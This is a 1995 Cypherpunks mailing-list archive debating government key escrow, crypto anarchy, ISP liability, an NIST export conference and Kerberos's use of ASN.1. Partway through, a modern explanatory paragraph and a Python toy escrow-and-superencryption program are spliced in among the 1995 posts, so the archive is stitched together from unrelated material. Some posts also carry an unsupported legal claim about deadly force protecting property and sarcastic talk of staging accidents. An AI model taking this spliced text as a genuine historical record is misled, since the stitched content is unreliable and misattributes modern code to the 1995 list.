other problems with key escrow, involving such things as how persistent the access keys will be (will a court order reveal past communications not covered by the order?), who will have access, etc. These are the things the government _wants_ us to focus on, as these can probably be fixed by sufficiently elaborate protocols...sort of. But the core issue is not being addressed, the core issue of surveillance and the government's plan to order us to speak only in certain approved modes. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Sep 7 10:22:39 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Sep 95 10:22:39 PDT Subject: Crypto Anarchy and Virtual Communities Message-ID: At 4:15 PM 9/7/95, Duncan Frissell wrote: >At 09:20 PM 9/6/95 -0500, Mac Norton wrote: >>Well, scratch me deeply enough, I'm not sure I'd disagree >>with Tim, "philosophically speaking." The problem is, as >>all the truly wise philosophers recognized, we must live >>in the world. And given the number of us who must do so, >>that entails rules. > >That's what so nice about the nets. You don't (won't) have to "live in the >world" any more. The creation of consentual halucinations (virtual worlds) >allows you to "change the world" at will. > >And once the interface improves... > >Actually, the creation of separate "spaces" that can only be entered with >your (each person's) permission will have a big impact on life in the real >world. I of course agree strongly with Duncan. We don't often talk about this aspect, as it was all hashed-over a couple of years ago, and most newcomers to the list do not seem as interested as we were. (And, it has little to do with coding in C :-}) Those interested might want to look at the very long chapter on "Crypto Anarchy" in my Cyphernomicon, or my paper, "Crypto Anarchy and Virtual Communities." Or read "True Names" and "Snow Crash" and think about what happens when the stuff we talk about is added. (Hint: Hiro Protagonist would not be "vastly wealthy" in the Metaverse but poor in the Real World (tm).) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From iang at cory.EECS.Berkeley.EDU Thu Sep 7 10:24:15 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Thu, 7 Sep 95 10:24:15 PDT Subject: How to get to Saturday's meeting in SF? Message-ID: <199509071724.KAA00396@cory.EECS.Berkeley.EDU> I'd like to go to the meeting on Saturday in SF, but I need instructions on how to get there by public transit from the Berkeley campus. (Alternatively, is anyone going that may be able to give me a lift?) Thanks, - Ian From hkhenson at shell.portal.com Thu Sep 7 10:25:07 1995 From: hkhenson at shell.portal.com (H Keith Henson) Date: Thu, 7 Sep 95 10:25:07 PDT Subject: PGP key disclosure Message-ID: <199509071723.KAA02608@jobe.shell.portal.com> [included msg] i've been told that larry wollersheim refuses to give up his de-encryption key to Co$, and will go to jail before he does. this is ok to post. i can't post yet, due to technology transfer happening here at the usf.edu --------------------------------------m. council, human being Hell, if you understood everything I say, you'd council at luna.cas.usf.edu be me. -Miles Davis [end included msg] I am off cypherpunks at the moment, so if there are any followups to this, please send me email. 
Thanks, Keith Henson

From tedwards at src.umd.edu Thu Sep 7 10:27:48 1995
From: tedwards at src.umd.edu (Thomas Grant Edwards)
Date: Thu, 7 Sep 95 10:27:48 PDT
Subject: ECPA (Was: University logging mail to anon.penet.fi)
In-Reply-To: <199509071535.LAA49458@tequesta.gate.net>
Message-ID:

On Thu, 7 Sep 1995, Jim Ray wrote:

> >Even if we were in a more libertarian society you run the risk of
> >being boycotted by potential customers (of corse the analagy breaks
> >down somewhat, in a very libertarian society oyu might be able to
> >run a profatable ISP selling to the very nich market of people who
> >want to threten, harass, or generally make a nuicence of themselves).

> To "to threten, harass, or generally make a nuicence"[SIC] of himself,
> one must violate this pledge, and there would no-doubt still be legal
> results.

Clearly threats of violence are not considered legal by most libertarians,
including the Libertarian Party of the US.

Furthermore, there is no reason why an ISP has to connect to another ISP.
ISPs that do more harm than good may not be invited to participate in major
switching centers.

-Thomas

From duncan at hasp.com Thu Sep 7 10:29:21 1995
From: duncan at hasp.com (Duncan J Watson)
Date: Thu, 7 Sep 95 10:29:21 PDT
Subject: GAK
In-Reply-To:
Message-ID: <9509071332.ZM124@titan.hasp.com>

Brian,

Your question is very hard to answer as posed. How is access granted? To
whom? In what period of time?, etc. The details are very important here as
this is a very detail-oriented list. Also the details of implementation are
where you may find the objections. Many plans sound grand when loosely
described but fail due to small details.

My personal belief is that any mandatory key escrow system will be open to
abuse by authority figures. A solidly implemented key escrow service
operated by smart privacy oriented private firms would benefit corporations
and others engaged in cooperative development or other cooperative
operations.
Key escrow would keep the accountants and lawyers happy.

Just my $0.02.

djw

On Sep 3, 9:25pm, Brian Davis wrote:
> Subject: Re: GAK
[stuff deleted]
> I, of course, know of the "dislike" of GAK here. I am curious to know,
> however, if the "dislike" is because government would have access under
> any circumstances or if the primary worry is that government will cheat
> and get access when most would agree that they shouldn't (either by the
> judge "cheating" or a TLA stealing it).
>
> In other words ... if it took agreement by a review board composed of
> non-LEA members of this list, would the escrow be acceptable??
>
> EBD
>
>-- End of excerpt from Brian Davis

--
Duncan J Watson                    Email: Duncan at hasp.com
Tech Support Manager/Sys Admin     Ph#:  +1 212 564 5678
Aladdin Software Security Inc      Fax#: +1 212 564 3377
:::finger Duncan at hasp.com for PGP key:::      http://www.aks.com/

From tcmay at got.net  Thu Sep 7 10:34:48 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:34:48 PDT
Subject: Why Key Escrow (GAK) is So Bad
Message-ID:

I wrote:

....
made for communications escrow. Lots of crimes would be solved, and even OJ might be convicted, if a court could order the "position escrow" files opened. So what? That's now what a free society is about.
....

This last line has a typo. What I meant to say was:

"That's not what a free society is about."

Normally I don't post minor corrections, but this one needs correcting.

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net  Thu Sep 7 10:55:19 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 7 Sep 95 10:55:19 PDT
Subject: GAK Hacks
Message-ID:

At 3:43 PM 9/7/95, Matthew Ghio wrote:

>The same applies to GAK. There is no reason to hack it when you can just
>use PGP instead. The only reason to hack it would be if it became a
>standard. If we have to start hacking GAK applications, we've already
>lost to a degree. Thus our focus should be on making alternatives
>available instead of just attacking GAK. (Although I suppose you could
>show how to hack it, for the sake of making a political statement.)

GAK Hacks!

We did it for SSL, let's do it for GAK.

Demonstrate that superencryption (encrypting within a GAK wrapper) defeats GAK. And other kinds of hacks, including releasing "damaged" (inoperative) versions of the proposed code (when it becomes available).

Or releasing "work-alikes." Etc.

Granted, the demonstrations will be less clear than breaking the 40-bit key was, partly because there is no clear-cut standard out there, and many aspects of GAK are still in flux.

But it could still be a powerful example, an example "by direct demonstration," that government-mandated key escrow is problematic.

(Of course, a sufficiently powerful or clear demonstration, picked up by the popular press the way the SSL challenge was, could also cause the government to tighten up the rules on GAK, such as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

But GAK Hacking could be an interesting project.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
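Tim's superencryption point, worked as an added example (this is not code from the post or from any real or proposed escrow product): a constructed toy escrow envelope whose compliance check and escrow recovery both succeed, yet the escrow agent gets back only the inner ciphertext when the payload was encrypted first under a key that was never escrowed. The stream cipher, the envelope fields and all key and nonce values are invented here for illustration; the lesson for anyone designing or operating an escrow service is that the escrow field proves a key was escrowed, not that the body is plaintext under it.

```python
"""Toy model of a GAK-style escrow envelope, and of superencryption inside it.
Everything here is constructed for illustration: the stream cipher, the
envelope layout and the key material are hypothetical, not a real escrow design."""
import hashlib
import hmac

KEY_LEN = 16     # bytes; session, agent and private keys are all this size
NONCE_LEN = 8
TAG_LEN = 4      # keyed checksum over the escrow field (a LEAF-style checksum)


def toy_stream_cipher(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Counter-mode keystream from HMAC-SHA256, XORed over the data.
    Constructed toy (no authentication, not for real use). XOR is its own
    inverse, so the same call both encrypts and decrypts."""
    out = bytearray()
    for block_no in range((len(data) + 31) // 32):
        block = hmac.new(key, nonce + block_no.to_bytes(4, "big"), hashlib.sha256).digest()
        chunk = data[block_no * 32:(block_no + 1) * 32]
        out.extend(a ^ b for a, b in zip(chunk, block))
    return bytes(out)


def _escrow_tag(agent_key: bytes, nonce: bytes, wrapped_key: bytes) -> bytes:
    """Checksum that lets compliant software detect a missing or forged escrow field."""
    return hmac.new(agent_key, b"tag:" + nonce + wrapped_key, hashlib.sha256).digest()[:TAG_LEN]


def gak_wrap(session_key: bytes, nonce: bytes, payload: bytes, agent_key: bytes) -> dict:
    """Sender side of the escrow scheme: payload under a per-message session key,
    session key escrowed (encrypted to the agent) in a checksummed field."""
    assert len(session_key) == KEY_LEN and len(nonce) == NONCE_LEN
    wrapped = toy_stream_cipher(agent_key, b"escrow:" + nonce, session_key)
    escrow_field = wrapped + _escrow_tag(agent_key, nonce, wrapped)
    body = toy_stream_cipher(session_key, b"body:" + nonce, payload)
    return {"nonce": nonce, "escrow": escrow_field, "body": body}


def escrow_field_valid(envelope: dict, agent_key: bytes) -> bool:
    """All a compliance check can verify: the escrow field is well formed and its
    checksum matches. It cannot tell whether the body is plaintext under that key."""
    field = envelope["escrow"]
    if len(field) != KEY_LEN + TAG_LEN:
        return False
    wrapped, tag = field[:KEY_LEN], field[KEY_LEN:]
    return hmac.compare_digest(tag, _escrow_tag(agent_key, envelope["nonce"], wrapped))


def agent_recover(envelope: dict, agent_key: bytes) -> bytes:
    """Escrow agent side: unwrap the session key and open the body."""
    wrapped = envelope["escrow"][:KEY_LEN]
    session_key = toy_stream_cipher(agent_key, b"escrow:" + envelope["nonce"], wrapped)
    return toy_stream_cipher(session_key, b"body:" + envelope["nonce"], envelope["body"])


def superencrypt_and_wrap(session_key, nonce, private_key, inner_nonce, plaintext, agent_key):
    """Superencryption: encrypt first under a key the agent never sees, then put
    that ciphertext (with its nonce) into a fully compliant envelope."""
    inner = toy_stream_cipher(private_key, b"inner:" + inner_nonce, plaintext)
    return gak_wrap(session_key, nonce, inner_nonce + inner, agent_key)


def recipient_open(envelope, session_key, private_key):
    """Intended recipient: holds the session key (from the normal key exchange)
    and the private key shared out of band, so can peel both layers."""
    outer = toy_stream_cipher(session_key, b"body:" + envelope["nonce"], envelope["body"])
    inner_nonce, inner = outer[:NONCE_LEN], outer[NONCE_LEN:]
    return toy_stream_cipher(private_key, b"inner:" + inner_nonce, inner)


# Constructed sample keys, nonces and message (all hypothetical).
AGENT_KEY = hashlib.sha256(b"escrow agent master key").digest()[:KEY_LEN]
SESSION_KEY = hashlib.sha256(b"per-message session key").digest()[:KEY_LEN]
PRIVATE_KEY = hashlib.sha256(b"key the agent never sees").digest()[:KEY_LEN]
NONCE = bytes(range(1, NONCE_LEN + 1))
INNER_NONCE = bytes(range(11, 11 + NONCE_LEN))
MESSAGE = b"quarterly figures attached, do not forward"


def compare_recoveries() -> dict:
    """Run both flows and return what the escrow agent actually obtains from a
    plain envelope versus a superencrypted one (plus the recipient's view)."""
    plain_env = gak_wrap(SESSION_KEY, NONCE, MESSAGE, AGENT_KEY)
    super_env = superencrypt_and_wrap(SESSION_KEY, NONCE, PRIVATE_KEY,
                                      INNER_NONCE, MESSAGE, AGENT_KEY)
    return {
        "plain_compliant": escrow_field_valid(plain_env, AGENT_KEY),
        "plain_recovered": agent_recover(plain_env, AGENT_KEY),
        "super_compliant": escrow_field_valid(super_env, AGENT_KEY),
        "super_recovered": agent_recover(super_env, AGENT_KEY),
        "super_recipient": recipient_open(super_env, SESSION_KEY, PRIVATE_KEY),
    }


if __name__ == "__main__":
    for name, value in compare_recoveries().items():
        print(f"{name}: {value!r}")
```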
From pjm at ionia.engr.sgi.com  Thu Sep 7 11:05:49 1995
From: pjm at ionia.engr.sgi.com (Patrick May)
Date: Thu, 7 Sep 95 11:05:49 PDT
Subject: GAK
In-Reply-To:
Message-ID: <199509071805.LAA12805@ionia.engr.sgi.com>

Brian Davis writes:
> I, of course, know of the "dislike" of GAK here. I am curious to know,
> however, if the "dislike" is because government would have access under
> any circumstances or if the primary worry is that government will cheat
> and get access when most would agree that they shouldn't (either by the
> judge "cheating" or a TLA stealing it).

Since you're sure to get a number of long responses to this question, I'll keep mine short.

I don't want to give anyone my keys. I do not harm anyone by refusing to do so. Therefore, anyone using force to take my keys is acting immorally.*

> In other words ... if it took agreement by a review board composed of
> non-LEA members of this list, would the escrow be acceptable??

No. I don't choose to give Louis Freeh my keys. I don't choose to give Brian Davis my keys. I don't choose to give Tim May my keys. Any use of force to compel me to yield my keys is unacceptable.

Regards,

Patrick May

* Insert standard Objectivist and Libertarian arguments regarding morality, government, and force here.

From dmandl at panix.com  Thu Sep 7 11:46:16 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Thu, 7 Sep 95 11:46:16 PDT
Subject: Collection of personal info
In-Reply-To: <199509071616.MAA04473@panix.com>
Message-ID:

On Thu, 7 Sep 1995, Duncan Frissell wrote:

> That's what so nice about the nets. You don't (won't) have to "live in the
> world" any more. The creation of consensual hallucinations (virtual worlds)
> allows you to "change the world" at will.

Goody. In this virtual world, we can also abolish all taxes, remove all restrictions on crypto use, or even get rid of the government altogether. I just hope I can find enough food there.

> And once the interface improves...

...I won't have to deal with the inefficiencies of real sex, live music performances, or (non-virtual) world travel ever again.

> Actually, the creation of separate "spaces" that can only be entered with
> your (each person's) permission will have a big impact on life in the real
> world.

Yeah, it'll wipe it out.
I've got to tell you, Duncan, this kind of rhetoric pushes me over to the luddite side more every day.

No flame intended--just one man's opinion.

--Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem

From tomservo at access.digex.net  Thu Sep 7 11:48:09 1995
From: tomservo at access.digex.net (Scott Fabbri)
Date: Thu, 7 Sep 95 11:48:09 PDT
Subject: Force Ratios
Message-ID: <199509071847.OAA08292@access5.digex.net>

> But the most interesting thing that this emphasized for me was the sort of
> modern information warfare issues as highlighted in the recent Economist
> Survey. Info war is war by other means (a little shooting, communications,
> publicity, and litigation) and look what happened at Ruby Ridge. The Feds
> deployed 400 "troopies", some armored personnel carriers, copters, executive
> jets, Hummers, and other hardware. On the other side were 3 adults and 4
> children with some 14 personal weapons.
>
> The result. One Fed and two Weavers dead. A $3.1 million legal settlement,
> and continuing problems for the Feds. That smells like a bad defeat to me.
> They couldn't even kill 7 people with a 57 to 1 force ratio.

Well. I think if killing the Weaver clan was the primary objective, they could have been much more direct. One plane, one bomb/missile, one pilot, with a 1:7 force ratio (1:2 if you don't count probable noncombatants). Or a SEAL team with tools to make it look like an "accident" (carbon monoxide, maybe? A propane explosion?). However, we generally frown on that kind of thing in our polite society. :-) If the Feds had really wanted to kill the Weavers, it'd probably be called "Ruby Crater" now.

> In addition, the operation and the various investigations must have cost the
> Feds millions more. (What *do* the Fibbies have to pay for those Ninja
> Hoods?) And they lost.

Murphy's Law applies everywhere.
Most likely they really wanted to take Weaver and clan alive (and thought they could!), and the worst possible things happened. (Surprisingly enough, government TLAs know all about the concept of "bad press," and killing bystanders isn't SOP.)

> That suggests that the ability of The Great Enemy to overcome the sort of
> directed human activity of the frictionless markets we are building will be
> quite limited.

But they don't have to face you directly, just convince someone who allegedly represents you that a "law" is necessary to "save you from yourself" and to "keep our great country free and safe." Then you either play ball, or you wind up with a bunch of balaclava-clad guys in your bedroom one night, taking your computer and dragging you off. Maybe they don't get anything to convict you, but you still have to mount a costly defense. What a great system, eh? Just like the Founding Fathers imagined.

--
Scott Fabbri                                   MSTie #31643
tomservo at access.digex.net
"If I knew that a man was coming to my house with the conscious design of doing me good, I should run for my life." --Thoreau

From jlasser at rwd.goucher.edu  Thu Sep 7 12:12:59 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Thu, 7 Sep 95 12:12:59 PDT
Subject: GAK
In-Reply-To:
Message-ID:

On Sun, 3 Sep 1995, Brian Davis wrote:

> I, of course, know of the "dislike" of GAK here. I am curious to know,
> however, if the "dislike" is because government would have access under
> any circumstances or if the primary worry is that government will cheat
> and get access when most would agree that they shouldn't (either by the
> judge "cheating" or a TLA stealing it).
...or "somebody else" (ie commercial competitor, personal or political rival, etc) paying off somebody to obtain it. I don't trust the gvm't to only get access when they should, either.

> In other words ... if it took agreement by a review board composed of
> non-LEA members of this list, would the escrow be acceptable??

Not necessarily; the members of the review board can be bribed, blackmailed, lied to, etc. I don't believe there's a competent review board available...nor do I think such a thing could be created.

Jon
------------------------------------------------------------------------------
Jon Lasser (410)494-3072              Visit my home page at
                                      http://www.goucher.edu/~jlasser/
You have a friend at the NSA: Big Brother is watching. Finger for PGP key.

From rah at shipwright.com  Thu Sep 7 12:24:56 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 7 Sep 95 12:24:56 PDT
Subject: Industry Slams Gov's Encryption Export Plan
Message-ID:

--- begin forwarded text

Mime-Version: 1.0
Date: Thu, 07 Sep 1995 07:15:48
From: James Rapp
To: www-buyinfo at allegra.att.com, rpournel at hr.house.gov
Subject: Industry Slams Gov's Encryption Export Plan

I was at the 9/6 NIST session and this account is reasonably accurate. Even though a seemingly high percentage of attendees indicated displeasure with current Administration key escrow proposals, they seem hell bent on this path. Further, the sense was that industry representatives were basically invited as a simple window dressing maneuver. The engaging Whitfield Diffie of Sun Microsystems did an outstanding job of raising questions about the Administration's proposal. Today's session--"Desirable Characteristics for Key Escrow Agents."

Jim Rapp, "give me more info"
CyberStrategies
Alexandria, Virginia

Via Newsbytes, Kennedy Maize 9/6/95 12:00 a.m.

WASHINGTON, D.C., -- The Clinton administration's new proposal on export controls on encryption in software got a tongue lashing from the software industry today.
The administration's announcement of a so-called liberalization "suggests that the government is pursuing a 'son of Clipper' strategy that could lead to the mandatory use of government designed key escrow encryption," said Robert Holleyman, president of the Business Software Alliance.

Speaking at a conference sponsored by the National Institute of Standards and Technology, Holleyman said the administration plan to allow export only if the encryption scheme involves key escrow reveals "a misunderstanding of the marketplace and unless significantly changed, will prevent key escrow encryption from ever being commercially adopted."

The White House initiative, Holleyman said, "failed to provide immediate relief to software companies because it did nothing to liberalize export controls on generally available software employing non-key escrow encryption.

"Each delay by the administration in permitting the export of software with strong encryption capabilities results in lost sales for American companies," said Holleyman. "Ironically, foreign software competitors, unconstrained by export controls, continue to fill this void, with more than 200 foreign encryption programs available from 21 countries."

Under the new administration proposal, software companies that employ non-key escrow encryption would continue to be limited to a 40-bit key. Holleyman called for the administration to immediately permit 56-bit encryption without key escrow, which he said is the current world standard.

Last year, the administration was pushing a hardware-software approach to encryption, called the Clipper chip, which would have employed government-designated escrow agents to hold keys. Law enforcement agencies would have been able to get access to the keys from the escrow agents.
Of the administration proposal to loosen controls on key escrow encryption, Holleyman said that "the administration's inability to shake off the Clipper mind-set is effectively precluding the adoption of realistic criteria for commercial key recovery systems."

Holleyman suggested that a workable system must include strong encryption where users -- in the US and elsewhere -- are able to specify the key holder.

Current administration policy, Holleyman said, is jeopardizing the "future of the global information infrastructure and electronic commerce. Instead of paving the roads, the administration has left in place roadblocks on the information highway."

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<

From aba at dcs.exeter.ac.uk  Thu Sep 7 12:42:21 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Thu, 7 Sep 95 12:42:21 PDT
Subject: GAK Hacks
Message-ID: <8921.9509071941@exe.dcs.exeter.ac.uk>

Tim May writes on cpunks:
> We did it for SSL, let's do it for GAK.
>
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

I was just drooling over the fun to be had if and when this crap goes through. Surely a very fun thing to do. A new legit hobby for all those games crackers out there. (Hmm maybe not so legit, micro$oft has non-reverse engineering clauses on their stuff, but that doesn't stop anyone, and there's always remailers).
One of their requirements was resistance to static patches, as someone else pointed out that is just not possible in software, if someone gets really bored they can at worst disassemble the entire thing, and re-write it from scratch without any silly GAK stuff, or with a row of 00s where the escrowed key goes.

> Or releasing "work-alikes." Etc.
>
> Granted, the demonstrations will be less clear than breaking the 40-bit key
> was, partly because there is no clear-cut standard out there, and many
> aspects of GAK are still in flux.
>
> But it could still be a powerful example, an example "by direct
> demonstration," that government-mandated key escrow is problematic.
>
> (Of course, a sufficiently powerful or clear demonstration, picked up by
> the popular press the way the SSL challenge was, could also cause the
> government to tighten up the rules on GAK, such
> as--speculatively!!!!--adding "compliance audits" to the GAK laws.)

So the question is what do you prefer: 40 bits only or 64 bits which can be broken? Is it worth sabotaging what is essentially an impossible task open to having the GAK element hacked out? It would be much more fun if they'd agree to no limits on key sizes, and GAK.

What happens if the result of the talks which Pat Farrell kindly described is that it is impossible? What is their next move? We've had "voluntary" hardware key-escrow, and it got chucked out by widespread derision of the idea, now the same in software. Which direction does the next phased attack come from?

> But GAK Hacking could be an interesting project.

indeed.

Adam

From baldwin at RSA.COM  Thu Sep 7 12:51:50 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 7 Sep 95 12:51:50 PDT
Subject: Commercial Speech over Internet product
Message-ID: <9508078105.AA810503582@snail.rsa.com>

Here's an article about a commercial company that is doing speech over the Internet. Maybe someone would like to help them add encryption.

--Bob Baldwin, speaking for myself only.
------------------------

TrueSpeech Player enables real-time audio over Internet

SANTA CLARA, CALIFORNIA, U.S.A., 1995 SEP 1 (NB) -- DSP Group Inc. (NASDAQ:DSPG) announced a new Windows product, TrueSpeech Player, that is freely available on the Internet. The TrueSpeech Player enables TrueSpeech-encoded speech to be played in real-time over the Internet.

Kurt Magdanz, director of business development at DSP, told Newsbytes, "The TrueSpeech Player utilizes the TrueSpeech compression technology bundled in Microsoft's Windows 95 and Windows NT. True Speech is a very high quality algorithm which compresses speech. TrueSpeech Player allows users to decompress TrueSpeech in real time."

With the TrueSpeech compression algorithm, speech is communicated in real-time over standard telephone lines to computers capable of communicating at data rates of 14.4kbps (kilobits per second) or above, Newsbytes was told. Because the TrueSpeech Player converts compressed speech data in real-time, World Wide Web site visitors have access to high-quality speech over the Internet in real time, said Magdanz.

"The TrueSpeech Player is our first step in enabling high-quality speech communication in real-time over the Internet," said Yuval Cohen, vice president of business development with the DSP Group. "World Wide Web site and content developers can immediately begin developing TrueSpeech Player-compatible content without paying fees."

"Content developers who wish to create TrueSpeech Player-compatible speech content should visit our World Wide Web site for detailed instructions on how to use this new product," said Cohen.

DSP Group is currently developing an advanced TrueSpeech Server software package which will offer content developers tools, interaction with the TrueSpeech Player to enable advanced features, live broadcasting capability and enhanced server control with diagnostics, said Magdanz.
The TrueSpeech Player can be downloaded freely from DSP Group's World Wide Web site, http://www.dspg.com . DSP is headquartered in Santa Clara, California.

(Richard Bowers/19950831/Press Contact: Kurt Magdanz, DSP, 408-986-4300)

From pfarrell at netcom.com  Thu Sep 7 13:02:32 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Thu, 7 Sep 95 13:02:32 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509071959.MAA11919@netcom3.netcom.com>

>"If keys are escrowed, what purpose does a 64 bit limit serve?"

This question was asked, it seems like a zillion times, but probably no more than four or five times. It is a bit of a belt and suspenders idea. But it also shows how scared they are about real encryption.

It is clear that this meeting is a shame. Everyone in industry says it won't be marketable. The Govies say it will be great. What they really want is to force weak crypto on the US by forcing the vendors to make a weak product "for export" when all the vendors say that they have to have _only one_ version. If they have one version, and it is weak, we are safe from drug dealers, pedophiles and terrorists. (BTW, I used that phrase yesterday, so it should be in the Federal register's official record.)

>Secondarily, I observe that this apparently precludes the use of OTP.

No, they don't care about the cipher, only the key length, but with a 64bit, GAK'd key, you can't say much without repeating the P, and that makes it a TTP or a FTP (two time pad, or four time pad) which isn't very useful. You probably can gzip "attack at dawn" to 64 bits, but not much more.

Pat

Pat Farrell      grad student      http://www.isse.gmu.edu/students/pfarrellA
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request            #include standard.disclaimer

From cman at communities.com  Thu Sep 7 13:10:00 1995
From: cman at communities.com (Douglas Barnes)
Date: Thu, 7 Sep 95 13:10:00 PDT
Subject: GAK
Message-ID:

One good (non-cypherpunk) argument against GAK is that it concentrates a very large quantity of valuable keys in a few places, where they become an extremely attractive target for government or corporate espionage.

You could compare this to the function served by banks, but banks tend to notice fairly quickly when money is missing. Compromising keys doesn't involve removing anything, or throwing the books out of balance; they just get copied. The compromise is only revealed if they are used clumsily.

Note that a few million keys would fit very easily on even a low-end DAT tape (easily hidden in a pack of cigarettes).

From trei at process.com  Thu Sep 7 13:42:48 1995
From: trei at process.com (Peter Trei)
Date: Thu, 7 Sep 95 13:42:48 PDT
Subject: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509072042.AA20013@toad.com>

> >"If keys are escrowed, what purpose does a 64 bit limit serve?"

> This question was asked, it seems like a zillion times, but
> probably no more than four or five times.

> It is a bit of a belt and suspenders idea. But it also shows how
> scared they are about real encryption.

Is there an actual quote - did an identifiable government person actually use the 'belt and suspenders' line? This is getting to the point where journalists could have something to hang a story on.

I think we can infer from this that the USG has, or soon expects to have, the ability to brute 64 bits of key.

> It is clear that this meeting is a shame. Everyone in industry
                                     ^^^^^

A shame certainly, but I suspect you meant 'sham' (not a spelling flame, the difference in meaning is important).
> Pat
>

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From frissell at panix.com  Thu Sep 7 13:47:08 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 7 Sep 95 13:47:08 PDT
Subject: Collection of personal info
Message-ID: <199509072046.QAA26704@panix.com>

At 02:46 PM 9/7/95 -0400, dmandl at panix.com wrote:

>> And once the interface improves...
>
>...I won't have to deal with the inefficiencies of real sex, live
>music performances, or (non-virtual) world travel ever again.
>
>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission will have a big impact on life in the real
>> world.

Dave. Sorry you didn't catch the implied change of tone in the above. I meant to show a switch from Space Cadet rhetoric about the nets to a more realistic view.

>> And once the interface improves...

>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission

These separate spaces won't wipe out the Real World (used with permission) but they will influence it as a form of private property that is self-enforcing, neither dependent on force for protection nor capable of being penetrated by force. This is a BIG THING. You can't live in it yet but you will certainly be able to trade digital goods and services there and stash digital goods (work product, databases, etc.).

Having a place that is under your exclusive control has enormous practical and psychological implications. Think of the change that occurred when peasants came to be able to own land. Cyberspace contains spaces that can be cheaply created, individually owned, and free of confiscation. And since the bulk of the wealth of OECD countries is non-physical (consisting of various forms of ownership rights and "choses in action") that wealth can be protected cryptographically.
>I've got to tell you, Duncan, this kind of rhetoric pushes me over to
>the luddite side more every day.
>
>No flame intended--just one man's opinion.

Don't you like the idea of a "place" that's yours alone? It's not dangerous (to you). It increases your choices. Your power.

DCF

"You don't have to be nice to nation states you meet on the way up if you're not coming back down."

From alanh at infi.net  Thu Sep 7 13:52:40 1995
From: alanh at infi.net (Alan Horowitz)
Date: Thu, 7 Sep 95 13:52:40 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID:

I am pretty sure that it is lawful to use deadly force to protect property, in New Mexico.

From tytso at MIT.EDU  Thu Sep 7 15:25:19 1995
From: tytso at MIT.EDU (Theodore Ts'o)
Date: Thu, 7 Sep 95 15:25:19 PDT
Subject: Kerberos v5's experience with ASN.1
In-Reply-To: <9509071925.AA17839@toad.com>
Message-ID: <9509072225.AA26823@dcl.MIT.EDU>

   To: Cypherpunks Lite
   Date: Sat, 2 Sep 1995 13:55:38 -0400
   From: jis at mit.edu (Jeffrey I. Schiller)

   However, the problem with ASN.1 isn't its waste of space (which actually
   isn't that bad for a mechanism for encoding arbitrary objects).

While I won't argue about the rest of Jeff's note about the use of ASN.1 being a mistake, I do want to point out that certain ASN.1 types are in fact very wasteful of space. Most notable of these is the ASN.1 Generalized Time --- which encodes a timestamp in ASCII. ASN.1 GeneralizedTime therefore requires 17 bytes to encode, an over four-fold increase in the amount of space needed to store a time, compared with a 4 byte representation of "number of seconds since 1970". This is deadly in a protocol which has to store lots of timestamps, which is the case in Kerberos V5.

We could have gotten around this problem by merely storing an integer whenever we needed to store a timestamp, instead of using the ASN.1 abstract type.
Then it would have only taken 6 bytes (ASN.1 adds a 2-byte overhead for each object which you store).

                                                - Ted

From terrell at sam.neosoft.com  Thu Sep 7 15:52:29 1995
From: terrell at sam.neosoft.com (Buford Terrell)
Date: Thu, 7 Sep 95 15:52:29 PDT
Subject: GAK
Message-ID: <199509072302.SAA02407@sam.neosoft.com>

>Date: Sun, 3 Sep 1995 21:25:26 -0400 (EDT)
>From: Brian Davis
>Subject: Re: GAK

>On Fri, 1 Sep 1995, Timothy C. May wrote:
>
>> At 10:56 PM 9/1/95, Buford Terrell wrote:
>>
>> >If you've ever watched Not_at_all_Funny Home Videos or any of the
>> >American Urinal school of tabloid television, you soon start feeling
